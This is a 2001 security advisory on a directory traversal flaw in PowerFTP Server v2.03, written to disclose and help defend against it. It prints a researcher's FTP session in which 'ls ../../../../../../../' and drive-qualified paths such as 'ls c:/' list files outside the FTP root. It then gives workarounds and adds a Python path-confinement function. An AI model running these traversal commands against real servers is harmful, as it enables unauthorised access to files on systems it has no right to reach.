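PowerFTP Server Directory Traversal Vulnerability
Release date: 2001-11-28
Updated: 2001-11-29
Affected systems:
PowerFTPServer v2.03
Description:
PowerFTP Server is an FTP server for the Windows platform.
The FTP server has a security flaw: by adding strings such as "../" to command arguments, a remote attacker may be able to traverse the entire file system.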
<*Source: al3x hernandez (al3xhernandez@ureach.com)
Link: http://archives.neohapsis.com/archives/bugtraq/2001-11/0243.html
*>
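Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!
al3x hernandez (al3xhernandez@ureach.com) provided the following test code:
Disclosing the FTP physical path: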
# uname -a
SunOS Lab 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-5_10
#
# ftp 10.0.0.1
Connected to 10.0.0.1.
220 Personal FTP Server ready
Name (10.0.0.1:root): temp
331 Password required for temp.
Password:
230 User temp logged in.
ftp>
ftp> pwd
257 "C:/WINDOWS/Application Data/Microsoft/Internet Explorer/Quick
Launch/Mis documentos/tools/" is current directory.
ftp> cd .../.../
501 CWD failed. Cannot accept relative path using dot notation
ftp>
Moving up to parent directories:
ftp> ls ../../../../../../../
200 Port command successful.
150 Opening data connection for directory list.
SUHDLOG.DAT
COMMAND.COM
BOOTLOG.PRV
FRUNLOG.TXT
DOS
AUTOEXEC.DOS
CONFIG.DOS
VIDEOROM.BIN
CONFIG.SYS
DBLSPACE.BIN
MSDOS.SYS
MSDOS.---
SETUPLOG.TXT
WINDOWS
test.txt.txt
#
226 File sent ok
remote: ../../../../../../../
561 bytes received in 0.12 seconds (4.61 Kbytes/s)
ftp>
Traversing drive C:
ftp> ls c:/
200 Port command successful.
150 Opening data connection for directory list.
SUHDLOG.DAT
COMMAND.COM
BOOTLOG.PRV
FRUNLOG.TXT
DOS
[...]
Traversing drive D:
ftp> ls d:/
200 Port command successful.
150 Opening data connection for directory list.
00000001.LT1
AREF
AUTORUN.EXE
AUTORUN.INF
AUTORUN.INI
CLCD16.DLL
CLCD32.DLL
CLUF.TXT
D6F04BA8.BIN
DPLAYERX.DLL
DRVMGT.DLL
EE
EEAUTO.ICO
[...]
Traversing drive A:
ftp> ls a:/
200 Port command successful.
150 Opening data connection for directory list.
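Recommendations:
Temporary workaround:
If you cannot install a patch or upgrade immediately, NSFOCUS recommends taking the following measures to reduce the threat:
* Switch to another, secure FTP server
* Deny untrusted users access to this FTP server
Vendor patch:
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:
http://www.cooolsoft.com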
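The sessions above show CWD rejecting dot notation while LIST still accepts "../" sequences and drive-qualified paths such as c:/. As an added example (not part of the advisory and not PowerFTP's code), the following shows one way a server can confine the path argument of every command to the user's root; the function name resolve_in_root and the FTP_ROOT value are hypothetical.

```python
import ntpath  # Windows path rules, usable on any host OS

FTP_ROOT = r"C:\ftproot\temp"  # constructed sample root, not from the advisory

def resolve_in_root(root, cwd, arg):
    """Map the path argument of any FTP command (CWD, LIST, RETR, ...) to a
    local path under root; return None if it would leave root.
    cwd is the session's virtual directory, e.g. "/" or "/pub"."""
    arg = arg.replace("\\", "/")
    # Drive-qualified or UNC arguments ("c:/", "a:/", "//host/share") name a
    # location outside the virtual tree.
    drive, _ = ntpath.splitdrive(arg)
    if drive or arg.startswith("//"):
        return None
    # Absolute arguments start at the virtual root, relative ones at cwd.
    virtual = arg if arg.startswith("/") else cwd.rstrip("/") + "/" + arg
    parts = []
    for comp in virtual.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:        # would climb above the virtual root
                return None
            parts.pop()
        elif ":" in comp or comp.strip(". ") == "":
            return None          # "c:" mid-path, "...", blank names
        else:
            parts.append(comp)
    local = ntpath.normpath(ntpath.join(root, *parts))
    # Final containment check on the canonical, case-folded form.
    root_n = ntpath.normcase(ntpath.normpath(root))
    local_n = ntpath.normcase(local)
    if local_n != root_n and not local_n.startswith(root_n + "\\"):
        return None
    return local
```

The same function has to sit in front of every command that takes a path; validating only CWD leaves LIST and the transfer commands open, which is the gap the sessions above demonstrate.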